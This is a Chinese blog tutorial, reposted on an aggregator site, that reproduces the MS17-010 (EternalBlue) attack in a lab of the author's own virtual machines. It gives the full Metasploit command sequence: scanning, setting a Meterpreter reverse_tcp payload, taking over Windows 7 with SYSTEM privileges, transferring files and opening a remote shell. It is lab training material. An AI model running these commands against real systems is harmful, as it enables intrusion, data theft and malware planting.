ms17-010(永恒之蓝)漏洞复现

这篇具有很好参考价值的文章主要介绍了ms17-010(永恒之蓝)漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

目录

前言

一、了解渗透测试流程 

二、使用nmap工具对win7进行扫描

三、尝试ms17-010漏洞利用

四、结果展示

总结


🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。

💡本文由Filotimo__✍️原创,首发于CSDN📚。

📣如需转载,请事先与我联系以获得授权⚠️。

🎁欢迎大家给我点赞👍、收藏⭐️,并在留言区📝与我互动,这些都是我前进的动力!

🌟我的格言:森林草木都有自己认为对的角度🌟。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

前言

ms17-010(永恒之蓝)利用的端口是445端口。本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程 ,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。

这是本篇文章的脉络图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程


一、了解渗透测试流程 

这里简单介绍一下渗透测试流程 :

  1. 前期交互:在此阶段,你需要积极与客户沟通,了解业务范围、目标系统、安全需求、安全控制和限制等,以此来确定测试目标和方向。

  2. 信息收集:信息收集阶段需要获取尽可能多的关于目标系统的信息,包括IP地址、域名、子域名、网络架构、操作系统、应用程序、服务端口、漏洞信息以及员工信息等等。

  3. 威胁建模:通过整合和分析信息,识别出可能对目标系统造成威胁的攻击者和威胁途径,建立起安全威胁模型。

  4. 漏洞分析:在这个阶段,你需要对目标系统进行深入的安全测试,包括对网络架构、操作系统、应用程序和数据库等进行漏洞分析,找出目标系统中存在的所有漏洞。

  5. 渗透攻击:在此阶段,你需要根据漏洞分析阶段获得的漏洞信息,使用各种渗透测试工具和技术,对目标系统进行实际的攻击操作,并在攻击过程中获取系统权限及数据等敏感信息。

  6. 后渗透攻击:渗透测试的重点不是在于获取目标系统的权限或者破坏系统,而是在于发现目标系统存在的安全风险,为管理员提供有利于修复问题的信息,因此,在此阶段,你应该继续探测目标系统中的漏洞,并寻找能够保持持久性的方法。

  7. 报告:报告是渗透测试过程中最重要的一步,你需要准确地记录测试过程和结果,分析出系统中存在的安全风险和对策建议,以供管理员参考。报告应该清晰、详细、有结构,并包含可操作性很强的信息和建议。

需要强调的是,进行渗透测试时应事先获得授权,并始终遵守法律和道德准则。渗透测试是一种为了提升系统安全性而进行的评估活动,目的是帮助组织发现和修复潜在的漏洞,提升整体的安全水平。

二、使用nmap工具对win7进行扫描

Nmap(Network Mapper)是一个开源的网络扫描和端口扫描工具。它被用于发现网络上的主机、端口和服务,以及评估网络的安全性。Nmap具有强大的功能,可以进行主机发现、端口扫描、操作系统识别、服务和应用程序版本检测等。它被广泛应用于网络管理员、安全专家和黑客等领域。

2.1

进入已经在虚拟机中搭配好的kali环境,打开kali终端。输入

sudo su

获得root权限。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

2.2

输入

ifconfig

查看kali的IP地址。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

这里我的kali的IP地址是192.168.216.129。

2.3

打开已经在虚拟机中搭配好的win7环境,win+r调出命令行,输入

ifconfig

查看win7的IP地址。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

这里我的win7的IP地址是192.168.216.128。

2.4

返回kali,输入

ping 192.168.216.128 -c 4

查看它们的网络是否能互通。注意如果没有设置ping的次数,kali会一直ping,所以这里要加入一些参数来限制ping的次数,-c 4的意思就是ping4次。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

必须互相ping通才能开始攻击,这里kali,win7使用的是同一个网络模式:NAT模式。

2.5

当kali和win7能够互相通信后,我们再利用Nmap对win7进行信息收集。输入

nmap 192.168.216.128 -sS

我的扫描结果是:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

port:接口,state:状态,service:服务程序。

扫描的结果显示,win7开放了21,135,138,445,3389等端口。

ms17-010(永恒之蓝)利用的端口就是445端口。

三、尝试ms17-010漏洞利用

ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。由于该漏洞易受攻击,且已经公开和广泛利用,因此建议 Windows 系统用户及时进行安全更新以避免被攻击。对于其渗透测试相关应用,可以使用 Metasploit 和其他渗透测试框架进行利用和测试。

3.1

在kali环境中,输入

msfconsole

Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit, 而且Metasploit框架在这些系统上的工作流程基本都一样。本章中的示例以Kali操作系统为基础,该操作系统预装Metasploit及在其上运行的第三方工具。Kali系统的下载地址为http://www.kali.org/downloads/

Metasploit框架(Metasploit Framework, MSF)是一个开源工具, 旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。

Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、Web、CLI)。推荐使用控制台接口,通过控制台接口,你可以访问和使用所有Metasploit的插件,例如Payload、 利用模块、Post模块等。 Metasploit还有第三方程序的接口,例如Nmap、SQLMap等, 可以直接在控制台接口里使用,要访问该界面,需要在命令行下输入msfconsole,MSF的启动界面如图所示。

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

msfconsole和metasploit的关系:msfconsole是metasploit的一个交互式命令行接口。

3.2

继续输入

search ms17-010

可以得到很多模块:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

exploit是攻击模块,auxiliary是辅助模块。

3.3

这里我们采用第三个模块,输入

use 3

得到如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

3.4

接着输入

show options

查看对应的配置信息:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

yes表示是你必须要填写的一些信息。这里缺少rhosts,也就是你要攻击的目标IP地址。

3.5

设置一个要攻击的IP

set rhosts 192.168.216.128

如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

192.168.216.128是我的虚拟机win7地址。

3.6

直接run

run

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

没有报错,结果显示我们可以直接利用ms17-010(永恒之蓝)这个漏洞

3.7

真正攻击使用的模块是use 0,输入

use 0

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

3.8

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

meterpreter是一种渗透工具,reverse_tcp的意思是采用反向连接。反向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。

3.9

查看还要配置的东西,输入

show options

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

我这里缺少rhosts和lhost

3.10

把缺少的补上,输入

set rhosts 192.168.216.128

如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

192,168.216.128是被攻击的win7的IP地址。

继续输入

set lhost 192.168.216.129

如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

192,168.216.129是发动攻击的kali的IP地址。

3.11

前面步骤弄好后,run一下发动攻击。

run

结果如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

WIN,攻击成功了!!!

通过kali接管了win7!!!

四、结果展示

4.1

继续在kali终端输入

screenshot

screenshot是指对屏幕或特定应用程序界面进行截图或屏幕截取的操作。

如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

意思是已经将win7系统页面截图,并将图片命名为giSWaQ0g.jpeg,保存在kali桌面上。

在kali桌面上,我已经将giSWaQ0g.jpeg重命名为了1.jpg。

所以看到的是:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

4.2

查看获得的权限,输入

getuid

如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

"NT AUTHORITY\SYSTEM" 是指 Windows 操作系统中的一个内置的系统用户账户。"NT AUTHORITY" 是一个特殊的身份验证提供者,用于表示操作系统级别的权限。"SYSTEM" 是指代该账户是以系统级别权限运行的。

"NT AUTHORITY\SYSTEM" 账户具有非常高的权限,在 Windows 系统中拥有完全的访问权限,可以对系统文件、注册表和其他系统资源进行操作。它通常被系统服务、操作系统进程和某些应用程序使用,用于运行关键任务和操作。

该账户拥有极高的权限,要谨慎使用和修改与其相关的设置,不当的更改可能会导致系统不稳定或运行故障。一般情况下,普通用户无法直接登录或操作 "NT AUTHORITY\SYSTEM" 账户。

4.3

接下来将1.jpg图片上传到win7里面,这里将1.jpg重命名为filotimo.jpg,输入

upload /home/kali/Desktop/1.jpg c://filotimo.jpg

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

可以在win7系统c盘中看到出现了一张名为filotimo.jpg的图片。

这里你甚至可以上传木马,什么都可以!!!

4.4

下载可以在kali终端继续输入

download c://filotimo.jpg /home/kali/Desktop/2.jpg

这是将win7里的filotimo.jpg图片下载到了kali桌面上,并重命名为2.jpg。

结果如图:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程

这里可以看到kali桌面上出现了一个2.jpg。

4.5

在kali终端中继续输入

shell

此命令可以进入win7的cmd命令行,如图所示:

ms17-010(永恒之蓝)漏洞复现,网络安全,web安全,网络安全,信息与通信,青少年编程


总结

更多实验结果我就不一一展示了。此次漏洞复现我是用自己的虚拟机环境kali攻击自己的另一个虚拟机环境win7,如果你们要复现的话,我也建议拿自己试手。文章来源地址https://www.toymoban.com/news/detail-703184.html

到了这里,关于ms17-010(永恒之蓝)漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(31)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(27)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(32)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(78)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(30)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(31)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(27)
  • MS17-010永恒之蓝漏洞复现(手把手教程,超细!)

    0x00-声明:小白一枚,写下来为了记录和学习交流,大神不喜勿喷。 0x01-思路:网段扫描—获取IP—漏洞扫描—发现存在漏洞—攻击拿shell—提权 目录 一、环境搭建                 01 所需软件:  二、开始操作  01 kali 开始网段扫描 02 漏洞利用 03 提权 04 利用管理员用

    2023年04月09日
    浏览(66)
  • 网络安全入门第一课—永恒之蓝(ms17-010)

    目录 一、永恒之蓝(Eternal Blue) 二、实验环境 1.软件:VMware Workstations14 以上版本 2.虚拟机:Kali-Linux、Windows 7  三、永恒之蓝实验 1.打开终端使用命令行查看ip地址,并测试是否能互通 2. 主机发现 3.启动msf 4.查看漏洞模块 5.扫描过程 6.攻击过程 7.显示远程主机系统信息: s

    2024年02月08日
    浏览(41)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(22)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包